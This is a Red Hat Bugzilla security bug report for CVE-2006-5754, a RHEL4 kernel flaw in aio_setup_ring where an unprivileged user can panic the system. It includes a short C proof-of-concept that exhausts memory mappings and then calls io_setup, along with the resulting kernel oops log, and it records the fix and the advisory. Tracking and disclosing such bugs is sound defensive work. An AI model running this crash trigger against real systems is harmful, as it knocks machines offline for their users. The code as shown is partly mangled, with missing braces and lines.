Bug 220971 - CVE-2006-5754 kernel panic in aio_free_ring()
Summary: CVE-2006-5754 kernel panic in aio_free_ring()
Alias: None
Product: Red Hat Enterprise Linux 4
Classification: Red Hat
Component: kernel
Version: 4.4
Hardware: All
OS: Linux
Target Milestone: ---
: ---
Assignee: Jeff Moyer
QA Contact: Brian Brock
Whiteboard: impact=important,source=vendorsec,rep...
Depends On:
TreeView+ depends on / blocked
Reported: 2006-12-29 19:43 UTC by Vasily Averin
Modified: 2008-01-09 17:29 UTC (History)
3 users (show)

Fixed In Version: RHSA-2007-0014
Doc Type: Bug Fix
Doc Text:
Clone Of:
Last Closed: 2007-01-30 14:45:10 UTC
Target Upstream Version:

Attachments (Terms of Use)

System ID Private Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2007:0014 0 normal SHIPPED_LIVE Important: kernel security update 2007-01-30 14:25:00 UTC

Description Vasily Averin 2006-12-29 19:43:42 UTC
Kostantin Khorenko from OpenVZ/Virtuozzo linux kernel team has noticed the
following issue on RHEL4 2.6.9-42.0.3 kernel.

aio_setup_ring() function initializes info->nr_pages variable incorrectly, then
this variable can be used in error path to free the allocated resources. By this
way an unprivileged user can crash the node.

This issue was fixed in 2.6.10 kernel by the following patch:

[finist@svconsole tmp]$ id
uid=500(finist) gid=501(finist) groups=501(finist)
[finist@svconsole tmp]$ uname -a
Linux svconsole.sw.ru 2.6.9-42.0.3.ELsmp #1 SMP Mon Sep 25 17:28:02 EDT 2006
i686 i686 i386 GNU/Linux

[finist@svconsole tmp]$ cat map_count.c
#include <stdio.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <sys/mman.h>

int main(void)
        long res;
        unsigned long ctx = 0;
        int i = 0;
        void* map;

        while (1 == 1) {
                map = mmap(NULL, 100, PROT_READ, MAP_ANONYMOUS|MAP_PRIVATE,
                        0, 0);
                if (map == MAP_FAILED)
                map = mmap(NULL, 100, PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE,
                         0, 0);
                if (map == MAP_FAILED)
        printf("Done %d mmaps.\n", i);

        res = syscall(__NR_io_setup, 10000, &ctx);
        if (res != 0) {
                printf("Error in io_setup():%ld\n", res);
        return 0;
[finist@svconsole tmp]$ cat /proc/sys/vm/max_map_count
[finist@svconsole tmp]$ ./map_count
Done 65526 mmaps.
crash here.

mmap err: 12
Unable to handle kernel NULL pointer dereference at virtual address 00000000
 printing eip:
*pde = 0eb55001
Oops: 0000 [#1]
Modules linked in: ip_nat_irc ip_nat_ftp iptable_nat ipt_helper ipt_state
ipt_conntrack ip_conntrack_irc ip_conntrack_ftp ip_conntrack ipt_length ipt_LOG
ipt_ttl ipt_tcpmss ipt_REJECT ipt_TOS ipt_tos ipt_multiport ipt_limit
iptable_mangle md5 ipv6 8021q bridge atm iptable_filter ip_tables dm_mirror
dm_mod uhci_hcd 3c59x mii floppy ext3 jbd
CPU:    0
EIP:    0060:[<c01489de>]    Not tainted VLI
EFLAGS: 00010203   (2.6.9-42.0.3.ELsmp)
EIP is at put_page+0x2/0x6d
eax: 00000000   ebx: 00000001   ecx: cf679f7c   edx: 00000000
esi: cfb9c610   edi: cc4dbbc4   ebp: cc4dbb80   esp: cf679f60
ds: 007b   es: 007b   ss: 0068
Process map_count (pid: 3130, threadinfo=cf679000 task=cf3fed10)
Stack: c017a158 cfb9c5e0 cfb9c610 cff0073c cc4dbbc4 c017a30c c02e9bda 0000000c
       0000004f 0000277f cc4dbb80 00002710 cc4dbb80 cfb9c5e0 cf679000 c017a4d3
       bffffa80 ffffffea 00000000 c017b628 00002710 00000000 00000000 cf679000
Call Trace:
 [<c017a158>] aio_free_ring+0x1c/0x9f
 [<c017a30c>] aio_setup_ring+0x131/0x203
 [<c017a4d3>] ioctx_alloc+0xf5/0x17f
 [<c017b628>] sys_io_setup+0x39/0xa5
 [<c02d47cb>] syscall_call+0x7/0xb
 [<c02d007b>] packet_rcv+0x17e/0x307
Code: 35 94 18 00 e9 da fa ff ff e8 4f 94 18 00 e9 6f fb ff ff e8 21 94 18 00 e9
57 fe ff ff e8 3b 94 18 00 e9 d6 fe ff ff 90 90 89 c2 <8b> 00 f6 c4 80 74 2f 8b
52 0c 8b 02 89 d1 f6 c4 80 74 03 8b 4a
 <0>Fatal exception: panic in 5 seconds
Kernel panic - not syncing: Fatal exception

Comment 3 Jason Baron 2007-01-10 19:24:17 UTC
committed in stream U5 build 42.40. A test kernel with this patch is available
from http://people.redhat.com/~jbaron/rhel4/

Comment 5 Mike Gahagan 2007-01-19 15:59:20 UTC
fix verified on 42.0.7 with the included testcase

Comment 7 Red Hat Bugzilla 2007-01-30 14:45:10 UTC
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.


Note You need to log in before you can comment on or make changes to this bug.